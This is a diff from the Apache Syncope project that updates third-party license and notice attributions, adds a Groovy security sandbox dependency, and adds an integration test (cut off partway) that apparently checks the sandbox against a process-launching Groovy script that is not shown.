-For text-encoding (https://github.com/inexorabletash/text-encoding):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For tslib (https://github.com/Microsoft/tslib):
-This is licensed under the BSD license, see above.
-
-==
-
-For window.fetch polyfill (https://github.github.io/fetch/):
-This is licensed under the MIT license, see above.
-
-==
-
 For Wildfly (https://www.wildfly.org/):
 This is licensed under the AL 2.0, see above.
 
@@ -1657,148 +1682,6 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
-For Webjars-locator core functionality (https://github.com/webjars/webjars-locator-core):
-This is licensed under the MIT license, see above.
-tis.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Objenesis (http://objenesis.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Open SAML-Java (https://shibboleth.net/products/opensaml-java.html):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For ASM (http://asm.ow2.org/):
-This is licensed under the BSD license, see above.
-
-==
-
-For Reactive Streams (https://www.pac4j.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Passay (https://www.passay.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Project Lombok (https://projectlombok.org/):
-This is licensed under the MIT license, see above.
-
-==
-
-For Quartz Scheduler (http://quartz-scheduler.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Reactive Streams (http://www.reactive-streams.org/):
-This is licensed under the CC0 1.0, see above.
-
-==
-
-For Reflections (https://github.com/ronmamo/reflections):
-This is licensed under the BSD license, see above.
-
-==
-
-For Simple Logging Facade for Java - SLF4J (http://www.slf4j.org/):
-This is licensed under the MIT license, see above.
-
-==
-
-For Spring openapi documentation (https://springdoc.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Spring (https://spring.io/projects):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For spring-modules-cache:
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Thymeleaf (https://www.thymeleaf.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For unbescape (https://www.unbescape.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Chart.js (http://www.chartjs.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For Moment.js (http://momentjs.com/):
-This is licensed under the MIT license, see above.
-
-==
-
-For zxcvbn (https://github.com/dropbox/zxcvbn):
-This is licensed under the MIT license, see above.
-
-==
-
-For balanced-match (https://github.com/juliangruber/balanced-match):
-This is licensed under the MIT license, see above.
-
-==
-
-For base64-js (https://github.com/beatgammit/base64-js):
-This is licensed under the MIT license, see above.
-
-==
-
-For css-vars-ponyfill (https://github.com/jhildenbiddle/css-vars-ponyfill):
-This is licensed under the MIT license, see above.
-
-==
-
-For get-css-data (https://github.com/jhildenbiddle/get-css-data):
-This is licensed under the MIT license, see above.
-
-==
-
-For Inputmask (https://github.com/RobinHerbots/Inputmask):
-This is licensed under the MIT license, see above.
-
-==
-
-For Material Components for the web (https://github.com/material-components/material-components-web):
-This is licensed under the MIT license, see above.
-
-==
-
-For Webfont - Material Design Icons (https://github.com/Templarian/MaterialDesign-Webfont):
-This is licensed under the MIT license, see above.
-
-==
-
-For normalize.css (http://necolas.github.io/normalize.css/):
-This is licensed under the MIT license, see above.
-
-==
-
-For Summernote (https://summernote.org/):
-This is licensed under the MIT license, see above.
-
-==
-
 For text-encoding (https://github.com/inexorabletash/text-encoding):
 This is licensed under the AL 2.0, see above.
 
@@ -1809,252 +1692,10 @@ This is licensed under the BSD license, see above.
 
 ==
 
-For window.fetch polyfill (https://github.github.io/fetch/):
-This is licensed under the MIT license, see above.
-
-==
-
-For SnakeYAML (http://www.snakeyaml.org/):
-This is licensed under the AL 2.0, see above.
-
-==
-
-For popper.js (https://github.com/FezVrasta/popper.js):
-This is licensed under the MIT license, see above.
-
-==
-
-For spin.js (http://spin.js.org/):
-This is licensed under the MIT license, see above.
-
-==
-
-For Tempus Dominus Bootstrap 4 Datetime Picker (https://github.com/tempusdominus/bootstrap-4):
-This is licensed under the MIT license, see above.
-
-==
-
-For typeahead.js (http://twitter.github.io/typeahead.js/):
-This is licensed under the MIT license, see above.
-
-==
-
 For Webjars-locator core functionality (https://github.com/webjars/webjars-locator-core):
 This is licensed under the MIT license, see above.
 
 ==
 
-For Web Services Description Language for Java (http://wsdl4j.sourceforge.net/):
-This is licensed under the CPL:
-
-THE ACCOMPANYING PROGRAM IS PROVIDED UNDER THE TERMS OF THIS COMMON PUBLIC
-LICENSE ("AGREEMENT"). ANY USE, REPRODUCTION OR DISTRIBUTION OF THE PROGRAM
-CONSTITUTES RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT.
-
-1. DEFINITIONS
-
-"Contribution" means:
-
-a) in the case of the initial Contributor, the initial code and
-documentation distributed under this Agreement, and
-
-b) in the case of each subsequent Contributor:
-
-i) changes to the Program, and
-
-ii) additions to the Program;
-
-where such changes and/or additions to the Program originate from and are
-distributed by that particular Contributor. A Contribution 'originates' from a
-Contributor if it was added to the Program by such Contributor itself or anyone
-acting on such Contributor's behalf. Contributions do not include additions to
-the Program which: (i) are separate modules of software distributed in
-conjunction with the Program under their own license agreement, and (ii) are not
-derivative works of the Program.
-
-"Contributor" means any person or entity that distributes the Program.
-
-"Licensed Patents " mean patent claims licensable by a Contributor which are
-necessarily infringed by the use or sale of its Contribution alone or when
-combined with the Program.
-
-"Program" means the Contributions distributed in accordance with this Agreement.
-
-"Recipient" means anyone who receives the Program under this Agreement,
-including all Contributors.
-
-2. GRANT OF RIGHTS
-
-a) Subject to the terms of this Agreement, each Contributor hereby grants
-Recipient a non-exclusive, worldwide, royalty-free copyright license to
-reproduce, prepare derivative works of, publicly display, publicly perform,
-distribute and sublicense the Contribution of such Contributor, if any, and such
-derivative works, in source code and object code form.
-
-b) Subject to the terms of this Agreement, each Contributor hereby grants
-Recipient a non-exclusive, worldwide, royalty-free patent license under Licensed
-Patents to make, use, sell, offer to sell, import and otherwise transfer the
-Contribution of such Contributor, if any, in source code and object code form.
-This patent license shall apply to the combination of the Contribution and the
-Program if, at the time the Contribution is added by the Contributor, such
-addition of the Contribution causes such combination to be covered by the
-Licensed Patents. The patent license shall not apply to any other combinations
-which include the Contribution. No hardware per se is licensed hereunder.
-
-c) Recipient understands that although each Contributor grants the licenses
-to its Contributions set forth herein, no assurances are provided by any
-Contributor that the Program does not infringe the patent or other intellectual
-property rights of any other entity. Each Contributor disclaims any liability to
-Recipient for claims brought by any other entity based on infringement of
-intellectual property rights or otherwise. As a condition to exercising the
-rights and licenses granted hereunder, each Recipient hereby assumes sole
-responsibility to secure any other intellectual property rights needed, if any.
-For example, if a third party patent license is required to allow Recipient to
-distribute the Program, it is Recipient's responsibility to acquire that license
-before distributing the Program.
-
-d) Each Contributor represents that to its knowledge it has sufficient
-copyright rights in its Contribution, if any, to grant the copyright license set
-forth in this Agreement.
-
-3. REQUIREMENTS
-
-A Contributor may choose to distribute the Program in object code form under its
-own license agreement, provided that:
-
-a) it complies with the terms and conditions of this Agreement; and
-
-b) its license agreement:
-
-i) effectively disclaims on behalf of all Contributors all warranties and
-conditions, express and implied, including warranties or conditions of title and
-non-infringement, and implied warranties or conditions of merchantability and
-fitness for a particular purpose;
-
-ii) effectively excludes on behalf of all Contributors all liability for
-damages, including direct, indirect, special, incidental and consequential
-damages, such as lost profits;
-
-iii) states that any provisions which differ from this Agreement are offered
-by that Contributor alone and not by any other party; and
-
-iv) states that source code for the Program is available from such
-Contributor, and informs licensees how to obtain it in a reasonable manner on or
-through a medium customarily used for software exchange.
-
-When the Program is made available in source code form:
-
-a) it must be made available under this Agreement; and
-
-b) a copy of this Agreement must be included with each copy of the Program.
-
-Contributors may not remove or alter any copyright notices contained within the
-Program.
-
-Each Contributor must identify itself as the originator of its Contribution, if
-any, in a manner that reasonably allows subsequent Recipients to identify the
-originator of the Contribution.
-
-4. COMMERCIAL DISTRIBUTION
-
-Commercial distributors of software may accept certain responsibilities with
-respect to end users, business partners and the like. While this license is
-intended to facilitate the commercial use of the Program, the Contributor who
-includes the Program in a commercial product offering should do so in a manner
-which does not create potential liability for other Contributors. Therefore, if
-a Contributor includes the Program in a commercial product offering, such
-Contributor ("Commercial Contributor") hereby agrees to defend and indemnify
-every other Contributor ("Indemnified Contributor") against any losses, damages
-and costs (collectively "Losses") arising from claims, lawsuits and other legal
-actions brought by a third party against the Indemnified Contributor to the
-extent caused by the acts or omissions of such Commercial Contributor in
-connection with its distribution of the Program in a commercial product
-offering. The obligations in this section do not apply to any claims or Losses
-relating to any actual or alleged intellectual property infringement. In order
-to qualify, an Indemnified Contributor must: a) promptly notify the Commercial
-Contributor in writing of such claim, and b) allow the Commercial Contributor to
-control, and cooperate with the Commercial Contributor in, the defense and any
-related settlement negotiations. The Indemnified Contributor may participate in
-any such claim at its own expense.
-
-For example, a Contributor might include the Program in a commercial product
-offering, Product X. That Contributor is then a Commercial Contributor. If that
-Commercial Contributor then makes performance claims, or offers warranties
-related to Product X, those performance claims and warranties are such
-Commercial Contributor's responsibility alone. Under this section, the
-Commercial Contributor would have to defend claims against the other
-Contributors related to those performance claims and warranties, and if a court
-requires any other Contributor to pay any damages as a result, the Commercial
-Contributor must pay those damages.
-
-5. NO WARRANTY
-
-EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, THE PROGRAM IS PROVIDED ON AN
-"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, EITHER EXPRESS OR
-IMPLIED INCLUDING, WITHOUT LIMITATION, ANY WARRANTIES OR CONDITIONS OF TITLE,
-NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE. Each
-Recipient is solely responsible for determining the appropriateness of using and
-distributing the Program and assumes all risks associated with its exercise of
-rights under this Agreement, including but not limited to the risks and costs of
-program errors, compliance with applicable laws, damage to or loss of data,
-programs or equipment, and unavailability or interruption of operations.
-
-6. DISCLAIMER OF LIABILITY
-
-EXCEPT AS EXPRESSLY SET FORTH IN THIS AGREEMENT, NEITHER RECIPIENT NOR ANY
-CONTRIBUTORS SHALL HAVE ANY LIABILITY FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING WITHOUT LIMITATION LOST
-PROFITS), HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
-STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
-OUT OF THE USE OR DISTRIBUTION OF THE PROGRAM OR THE EXERCISE OF ANY RIGHTS
-GRANTED HEREUNDER, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
-
-7. GENERAL
-
-If any provision of this Agreement is invalid or unenforceable under applicable
-law, it shall not affect the validity or enforceability of the remainder of the
-terms of this Agreement, and without further action by the parties hereto, such
-provision shall be reformed to the minimum extent necessary to make such
-provision valid and enforceable.
-
-If Recipient institutes patent litigation against a Contributor with respect to
-a patent applicable to software (including a cross-claim or counterclaim in a
-lawsuit), then any patent licenses granted by that Contributor to such Recipient
-under this Agreement shall terminate as of the date such litigation is filed. In
-addition, if Recipient institutes patent litigation against any entity
-(including a cross-claim or counterclaim in a lawsuit) alleging that the Program
-itself (excluding combinations of the Program with other software or hardware)
-infringes such Recipient's patent(s), then such Recipient's rights granted under
-Section 2(b) shall terminate as of the date such litigation is filed.
-
-All Recipient's rights under this Agreement shall terminate if it fails to
-comply with any of the material terms or conditions of this Agreement and does
-not cure such failure in a reasonable period of time after becoming aware of
-such noncompliance. If all Recipient's rights under this Agreement terminate,
-Recipient agrees to cease use and distribution of the Program as soon as
-reasonably practicable. However, Recipient's obligations under this Agreement
-and any licenses granted by Recipient relating to the Program shall continue and
-survive.
-
-Everyone is permitted to copy and distribute copies of this Agreement, but in
-order to avoid inconsistency the Agreement is copyrighted and may only be
-modified in the following manner. The Agreement Steward reserves the right to
-publish new versions (including revisions) of this Agreement from time to time.
-No one other than the Agreement Steward has the right to modify this Agreement.
-IBM is the initial Agreement Steward. IBM may assign the responsibility to serve
-as the Agreement Steward to a suitable separate entity. Each new version of the
-Agreement will be given a distinguishing version number. The Program (including
-Contributions) may always be distributed subject to the version of the Agreement
-under which it was received. In addition, after a new version of the Agreement
-is published, Contributor may elect to distribute the Program (including its
-Contributions) under the new version. Except as expressly stated in Sections
-2(a) and 2(b) above, Recipient receives no rights or licenses to the
-intellectual property of any Contributor under this Agreement, whether
-expressly, by implication, estoppel or otherwise. All rights in the Program not
-expressly granted under this Agreement are reserved.
-
-This Agreement is governed by the laws of the State of New York and the
-intellectual property laws of the United States of America. No party to this
-Agreement will bring a legal action under this Agreement more than one year
-after the cause of action arose. Each party waives its rights to a jury trial in
-any resulting litigation.
+For window.fetch polyfill (https://github.github.io/fetch/):
+This is licensed under the MIT license, see above.

@@ -1,5 +1,5 @@
 Apache Syncope
-Copyright 2012-2023 The Apache Software Foundation
+Copyright 2012-2025 The Apache Software Foundation
 
 This product includes software developed by:
 The Apache Software Foundation (http://www.apache.org/).
@@ -13,6 +13,16 @@ This product includes software developed by the AOP Alliance (Java/J2EE AOP stan
 
 ==
 
+This product includes software developed by balanced-match
+Copyright (c) 2013 Julian Gruber <julian@juliangruber.com>
+
+==
+
+This product includes software developed by base64-js
+Copyright (c) 2014 Jameson Little
+
+==
+
 This product includes software developed by the Bootstrap project.
 Copyright (c) 2011-2016 Twitter, Inc.
 
@@ -57,6 +67,11 @@ Copyright (c) 2010 Pablo Fernandez
 
 ==
 
+This product includes software developed by the Gson project.
+Copyright (c) 2008 Google Inc.
+
+==
+
 This product includes software developed by Error Prone.
 
 ==
@@ -75,13 +90,13 @@ Copyright: 2007-2020, ZXing authors
 
 ==
 
-This product includes software developed by mchange-commons-java
-Copyright (C) 2015 Machinery For Change, Inc.
+This product includes software developed by Microsoft OAuth 2.0 User Agent library for Java
+Copyright (c) Microsoft Corporation
 
 ==
 
-This product includes software developed by Microsoft OAuth 2.0 User Agent library for Java
-Copyright (c) Microsoft Corporation
+This product includes software developed by Microsoft Azure Active Directory Authentication Library (ADAL) for Java
+Copyright (c) Microsoft Corporation. All rights reserved.
 
 ==
 
@@ -115,6 +130,11 @@ Copyright (c) 2022 Square, Inc.
 
 ==
 
+This product includes software developed by Okio
+Copyright 2013 Square, Inc.
+
+==
+
 This product includes software developed by Retrofit
 Copyright 2014 Square, Inc.
 
@@ -164,6 +184,11 @@ This product includes software developed by Dough Lea
 
 ==
 
+This product includes software developed by css-vars-ponyfill
+Copyright (c) 2018 John Hildenbiddle
+
+==
+
 This product includes software developed by DataTables
 Copyright (c) 2008-present, SpryMedia Limited
 
@@ -194,6 +219,11 @@ Copyright (C) 2009-2016 Kristopher Michael Kowal and contributors
 
 ==
 
+This product includes software developed by get-css-data
+Copyright (c) 2018 John Hildenbiddle
+
+==
+
 This product includes software developed by HAL Explorer
 Copyright (c) 2022 Kai Toedter <kai@toedter.com>
 
@@ -214,7 +244,12 @@ Copyright (c) 2020 Luke Hutchison
 
 ==
 
-This product includes software developed by Micrometer Application Metrics
+This product includes software developed by jsonwebtoken.io.
+Copyright (C) 2014-2023 jsonwebtoken.io
+
+==
+
+This product includes software developed by Micrometer Application Metrics.
 Copyright (c) 2017-Present VMware, Inc. All Rights Reserved.
 
 ==
@@ -234,6 +269,11 @@ All content is the property of the respective authors or their employers.
 
 ==
 
+This product includes software developed by the Eclipse Project for Jakarta Servlet.
+Copyright (c) 1997, 2024 Oracle and/or its affiliates and others. All rights reserved.
+
+==
+
 This product includes software produced and maintained by the Jakarta WebSocket project.
 All content is the property of the respective authors or their employers.
 
@@ -250,6 +290,11 @@ Copyright (c) 2012-2013 Oracle and/or its affiliates. All rights reserved.
 
 ==
 
+This product includes software developed by JSR107 (JCache).
+Copyright (c) JSR107 Expert Group
+
+==
+
 This product includes software developed by Expression Language 3.0 API
 Copyright (c) 1997-2013 Oracle and/or its affiliates. All rights reserved.
 
@@ -291,13 +336,18 @@ Copyright 2007, 2016 jQuery Foundation and other contributors.
 
 ==
 
+This product includes software developed by Material Components for the web
+Copyright 2018 Google Inc.
+
+==
+
 This product includes software developed by Byte Buddy
 Copyright 2014 - Present Rafael Winterhalter
 
 ==
 
-This product includes software developed by Groovy Extensions
-Copyright 2022, Emanuel Rabina (http://www.ultraq.net.nz/)
+This product includes software developed by normalize.css
+Copyright © Nicolas Gallagher and Jonathan Neal
 
 ==
 
@@ -354,11 +404,21 @@ This product includes software developed by the Woodstox Project.
 
 ==
 
+This product includes software developed by Terracotta. Inc.
+Ehcache source code and documentation are Copyright (c) Terracotta, Inc.
+
+==
+
 This product includes software developed by Java EE API modules repackaged as OSGi bundles in GlassFish
 Copyright (c) 1997-2011 Oracle and/or its affiliates. All rights reserved.
 
 ==
 
+This product includes software developed by Glassfish Expression Language Implementation.
+Copyright (c) 1997-2011 Oracle and/or its affiliates. All rights reserved.
+
+==
+
 This product includes software produced and maintained by Jakarta JSON Processing
 All content is the property of the respective authors or their employers.
 
@@ -481,33 +541,7 @@ Copyright (c) 2012-2016 Dan Wheeler and Dropbox, Inc.
 
 ==
 
-This product includes software developed by balanced-match
-Copyright (c) 2013 Julian Gruber <julian@juliangruber.com>
-
-==
-
-This product includes software developed by base64-js
-Copyright (c) 2014 Jameson Little
-
-==
-
-This product includes software developed by css-vars-ponyfill
-Copyright (c) 2018 John Hildenbiddle
-
-==
-
-This product includes software developed by get-css-data
-Copyright (c) 2018 John Hildenbiddle
-
-==
-
-This product includes software developed by Material Components for the web
-Copyright 2018 Google Inc.
-
-==
-
-This product includes software developed by normalize.css
-Copyright © Nicolas Gallagher and Jonathan Neal
+This product includes software developed by the SnakeYAML project.
 
 ==
 
@@ -516,204 +550,10 @@ Copyright (c) Microsoft Corporation.
 
 ==
 
-This product includes software developed by window.fetch polyfill
-Copyright (c) 2014-2016 GitHub, Inc.
-
-==
-
-This product includes software developed by the SnakeYAML project.
-
-==
-
 This product includes software developed by Webjars-locator core functionality
 Copyright (c) 2013 James Ward
-YPT team. All Rights Reserved
-
-==
-
-This product includes softare developed by the Javassist project.
-Copyright (C) 1999- by Shigeru Chiba, All rights reserved.
-
-==
-
-This product includes software developed by the JDOM project.
- Copyright (C) 2000-2012 Jason Hunter & Brett McLaughlin.
- All rights reserved.
-
-==
-
-This product includes software developed by JetBrains Java Annotations
-Copyright 2000-2021 JetBrains s.r.o.
-
-==
-
-This product includes software developed by jOOL
-Copyright (c), Data Geekery GmbH, contact@datageekery.com
-
-==
-
-This product includes software developed by JSON in Java
-Copyright (c) 2002 JSON.org
-
-==
-
-This product includes software developed by Ldaptive Java Library
-Copyright (C) 2003-2021 Virginia Tech. All Rights Reserved.
-
-==
-
-This product includes software developed by the Liquibase project.
-
-==
-
-This product includes software developed by the MyBatis project.
-
-==
-
-This product includes software developed by Objenesis
-Copyright 2006-2022 the original author or authors.
-
-==
-
-This product includes software developed by the Shibboleth project.
-
-==
-
-This product includes software developed by the ASM project.
-Copyright (c) 2000-2011 INRIA, France Telecom
-All rights reserved.
-
-==
-
-This product includes software developed by Passay
-Copyright (C) 2003-2022 Virginia Tech. All rights reserved.
-
-==
-
-This product includes software developed by Project Lombok
-Copyright (C) 2009-2021 The Project Lombok Authors.
-
-==
-
-This product includes software developed by Terracotta. Inc.
-Quartz Scheduler source code and documentation are Copyright (c) Terracotta, Inc.
-
-==
-
-This product includes software developed by the Reflections project.
-
-==
-
-This products includes software developed by the Simple Logging Facade for Java (SLF4J) project.
-Copyright (c) 2004-2016 QOS.ch.
-
-==
-
-This product includes software developed by Spring openapi documentation
-Copyright 2019-2020 the original author or authors.
-
-==
-
-This product includes software developed by SpringSource.
-Copyright (c) 2004-2022 SpringSource
-All rights reserved.
-
-==
-
-This product includes software developed by Thymeleaf
-Copyright (c) 2011-2018, The THYMELEAF team (http://www.thymeleaf.org)
-
-==
-
-This product includes software developed by unbescape
-Copyright 2012 Twitter, Inc.
-
-==
-
-This product includes software developed by the Chart.js project.
-Copyright (c) 2018 Chart.js Contributors
-
-==
-
-This product includes software developed by Moment.js.
-Copyright (c) JS Foundation and other contributors
-
-==
-
-This product includes software developed by zxcvbn
-Copyright (c) 2012-2016 Dan Wheeler and Dropbox, Inc.
-
-==
-
-This product includes software developed by balanced-match
-Copyright (c) 2013 Julian Gruber <julian@juliangruber.com>
-
-==
-
-This product includes software developed by base64-js
-Copyright (c) 2014 Jameson Little
-
-==
-
-This product includes software developed by css-vars-ponyfill
-Copyright (c) 2018 John Hildenbiddle
-
-==
-
-This product includes software developed by get-css-data
-Copyright (c) 2018 John Hildenbiddle
-
-==
-
-This product includes software developed by Inputmask
-Copyright (c) 2010 - 2018 Robin Herbots
-
-==
-
-This product includes software developed by Material Components for the web
-Copyright 2018 Google Inc.
-
-==
-
-This product includes software developed by normalize.css
-Copyright © Nicolas Gallagher and Jonathan Neal
-
-==
-
-This product includes software developed by Summernote
-Copyright (c) 2015~ Summernote Team (https://github.com/orgs/summernote/people)
-
-==
-
-This product includes software developed by tslib
-Copyright (c) Microsoft Corporation.
 
 ==
 
 This product includes software developed by window.fetch polyfill
 Copyright (c) 2014-2016 GitHub, Inc.
-
-==
-
-This product includes software developed by the SnakeYAML project.
-
-==
-
-This product includes software developed by popper.js
-Copyright (c) 2021 Floating UI contributors
-
-==
-
-This product includes software developed by Tempus Dominus Bootstrap 4 Datetime Picker
-Copyright (c) 2016 Tempus Dominus
-
-==
-
-This product includes software developed by Webjars-locator core functionality
-Copyright (c) 2013 James Ward
-
-==
-
-This product includes software developed by the Web Services Description Language for Java project.
-Copyright (c) Dice.
-All Rights Reserved.

@@ -208,11 +208,6 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
-For Caffeine (https://github.com/ben-manes/caffeine):
-This is licensed under the AL 2.0, see above.
-
-==
-
 For H2 (http://www.h2database.com/):
 This is licensed under the EPL 1.0:
 
@@ -437,7 +432,12 @@ This is licensed under the EPL 1.0, see above.
 
 ==
 
-For Eclipse Metro (https://projects.eclipse.org/projects/ee4j.metro):
+For UnboundID LDAP SDK for Java (https://github.com/pingidentity/ldapsdk):
+This is licensed under the AL 2.0, see above.
+
+==
+
+For Jakarta Activation (https://eclipse-ee4j.github.io/jaf/):
 This is licensed under the EDL 1.0:
 
 Eclipse Distribution License - v 1.0
@@ -465,11 +465,6 @@ WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWIS
 THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 
 
-==
-
-For Jakarta Activation (https://eclipse-ee4j.github.io/jaf/):
-This is licensed under the EDL 1.0, see above.
-
 ==
 
 For Eclipse Implementation of JAXB (https://projects.eclipse.org/projects/ee4j.jaxb-impl):
@@ -883,7 +878,7 @@ of liability.
 
 ==
 
-For Legion of the Bouncy Castle (http://www.bouncycastle.org/java.html):
+For Groovy Security Sandbox (https://github.com/Tirasa/groovy-security-sandbox):
 This is licensed under the MIT license:
 
  Permission is hereby granted, free  of charge, to any person obtaining
@@ -942,6 +937,11 @@ This is licensed under the AL 2.0, see above.
 
 ==
 
+For groovy-sandbox (https://github.com/craftercms/groovy-sandbox):
+This is licensed under the MIT license, see above.
+
+==
+
 For ASM (http://asm.ow2.org/):
 This is licensed under the BSD license, see above.
 

@@ -1,5 +1,5 @@
 Apache Syncope
-Copyright 2012-2023 The Apache Software Foundation
+Copyright 2012-2025 The Apache Software Foundation
 
 This product includes software developed by:
 The Apache Software Foundation (http://www.apache.org/).
@@ -13,11 +13,6 @@ This product includes software developed by the Jackson project.
 
 ==
 
-This product includes software developed by the Caffeine project.
-Copyright (c) 2021 Ben Manes. All Rights Reserved.
-
-==
-
 This product includes software developed by the GreenMail project.
 Copyright (c) 2006 - 2019, Wael Chatila and GreenMail project contributors
 
@@ -28,8 +23,8 @@ Copyright (c) 1997, 2021 Oracle and/or its affiliates. All rights reserved.
 
 ==
 
-This product includes software produced and maintained by Eclipse Metro
-All content is the property of the respective authors or their employers.
+This product includes software developed by UnboundID LDAP SDK for Java
+Copyright 2007-2022 Ping Identity Corporation
 
 ==
 
@@ -70,8 +65,9 @@ Copyright 2011-2016 Tirasa S.r.l. All rights reserved.
 
 ==
 
-This product includes software developed by the Legion of the Bouncy Castle.
-Copyright (c) 2000-2016 The Legion of the Bouncy Castle Inc. (http://www.bouncycastle.org)
+This product includes software developed by Groovy Security Sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
+Copyright (c) 2025 Tirasa
 
 ==
 
@@ -83,6 +79,11 @@ This product includes software developed by the Woodstox Project.
 
 ==
 
+This product includes software developed by groovy-sandbox
+Copyright (c) 2012-2020 Kohsuke Kawaguchi, CloudBees, Inc., other contributors
+
+==
+
 This product includes software developed by the ASM project.
 Copyright (c) 2000-2011 INRIA, France Telecom
 All rights reserved.

@@ -171,6 +171,11 @@ under the License.
       <artifactId>groovy-sql</artifactId>
     </dependency>
 
+    <dependency>
+      <groupId>net.tirasa</groupId>
+      <artifactId>groovy-security-sandbox</artifactId>
+    </dependency>
+
     <dependency>
       <groupId>com.icegreen</groupId>
       <artifactId>greenmail</artifactId>

@@ -417,6 +417,12 @@ under the License.
           <include>errorMessages.properties</include>
         </includes>
       </testResource>
+      <testResource>
+        <directory>${basedir}/../../core/spring/src/test/resources</directory>
+        <includes>
+          <include>*.groovy</include>
+        </includes>
+      </testResource>
     </testResources>
   </build>
   

@@ -25,8 +25,10 @@
 import static org.junit.jupiter.api.Assertions.assertTrue;
 import static org.junit.jupiter.api.Assertions.fail;
 
+import java.io.IOException;
 import java.nio.charset.StandardCharsets;
 import java.util.Locale;
+import java.util.UUID;
 import java.util.concurrent.TimeUnit;
 import javax.ws.rs.core.Response;
 import org.apache.commons.io.IOUtils;
@@ -74,6 +76,27 @@ public class MacroTaskITCase extends AbstractITCase {
         TCA.setPrinterName("aprinter112");
     }
 
+    private static void createMacroActionsIfNeeded(final String key, final ImplementationEngine engine,
+            final String body) {
+        ImplementationTO macroActions = null;
+        try {
+            macroActions = IMPLEMENTATION_SERVICE.read(IdRepoImplementationType.MACRO_ACTIONS, key);
+        } catch (SyncopeClientException e) {
+            if (e.getType().getResponseStatus() == Response.Status.NOT_FOUND) {
+                macroActions = new ImplementationTO();
+                macroActions.setKey(key);
+                macroActions.setEngine(engine);
+                macroActions.setType(IdRepoImplementationType.MACRO_ACTIONS);
+                macroActions.setBody(body);
+                Response response = IMPLEMENTATION_SERVICE.create(macroActions);
+                macroActions = IMPLEMENTATION_SERVICE.read(
+                        macroActions.getType(), response.getHeaderString(RESTHeaders.RESOURCE_KEY));
+                assertNotNull(macroActions.getKey());
+            }
+        }
+        assertNotNull(macroActions);
+    }
+
     @BeforeAll
     public static void testCommandsSetup() throws Exception {
         CommandITCase.testCommandSetup();
@@ -98,24 +121,10 @@ public static void testCommandsSetup() throws Exception {
         }
         assertNotNull(transformer);
 
-        ImplementationTO macroActions = null;
-        try {
-            macroActions = IMPLEMENTATION_SERVICE.read(IdRepoImplementationType.MACRO_ACTIONS,
-                    TestMacroActions.class.getSimpleName());
-        } catch (SyncopeClientException e) {
-            if (e.getType().getResponseStatus() == Response.Status.NOT_FOUND) {
-                macroActions = new ImplementationTO();
-                macroActions.setKey(TestMacroActions.class.getSimpleName());
-                macroActions.setEngine(ImplementationEngine.JAVA);
-                macroActions.setType(IdRepoImplementationType.MACRO_ACTIONS);
-                macroActions.setBody(TestMacroActions.class.getName());
-                Response response = IMPLEMENTATION_SERVICE.create(macroActions);
-                macroActions = IMPLEMENTATION_SERVICE.read(
-                        macroActions.getType(), response.getHeaderString(RESTHeaders.RESOURCE_KEY));
-                assertNotNull(macroActions.getKey());
-            }
-        }
-        assertNotNull(macroActions);
+        createMacroActionsIfNeeded(
+                TestMacroActions.class.getSimpleName(),
+                ImplementationEngine.JAVA,
+                TestMacroActions.class.getName());
 
         if (MACRO_TASK_KEY == null) {
             MACRO_TASK_KEY = TASK_SERVICE.<MacroTaskTO>search(
@@ -174,8 +183,8 @@ public void execute() {
         parent.setValue("/odd");
 
         int preExecs = TASK_SERVICE.read(TaskType.MACRO, MACRO_TASK_KEY, true).getExecutions().size();
-        ExecTO execution = TASK_SERVICE.execute(new ExecSpecs.Builder().key(MACRO_TASK_KEY).build(), form);
-        assertNotNull(execution.getExecutor());
+        ExecTO exec = TASK_SERVICE.execute(new ExecSpecs.Builder().key(MACRO_TASK_KEY).build(), form);
+        assertNotNull(exec.getExecutor());
 
         await().atMost(MAX_WAIT_SECONDS, TimeUnit.SECONDS).pollInterval(1, TimeUnit.SECONDS).until(() -> {
             try {
@@ -185,7 +194,7 @@ public void execute() {
             }
         });
 
-        ExecTO exec = TASK_SERVICE.read(TaskType.MACRO, MACRO_TASK_KEY, true).getExecutions().get(preExecs);
+        exec = TASK_SERVICE.read(TaskType.MACRO, MACRO_TASK_KEY, true).getExecutions().get(preExecs);
         assertEquals(ExecStatus.SUCCESS.name(), exec.getStatus());
 
         AnyObjectTO printer = ANY_OBJECT_SERVICE.read(PRINTER, TCA.getPrinterName());
@@ -264,4 +273,61 @@ public void cantExecute() {
             assertEquals(ClientExceptionType.DelegatedAdministration, e.getType());
         }
     }
+
+    @Test
+    public void groovySecuritySandbox() throws IOException {
+        createMacroActionsIfNeeded(
+                "ProcessBuilderMacroActions",
+                ImplementationEngine.GROOVY,
+                IOUtils.toString(
+                        getClass().getResourceAsStream("/ProcessBuilderMacroActions.groovy"), StandardCharsets.UTF_8));
+
+        MacroTaskTO task = new MacroTaskTO();
+        task.setName("groovySecuritySandbox" + UUID.randomUUID().toString());
+        task.setActive(true);
+        task.setRealm("/odd");
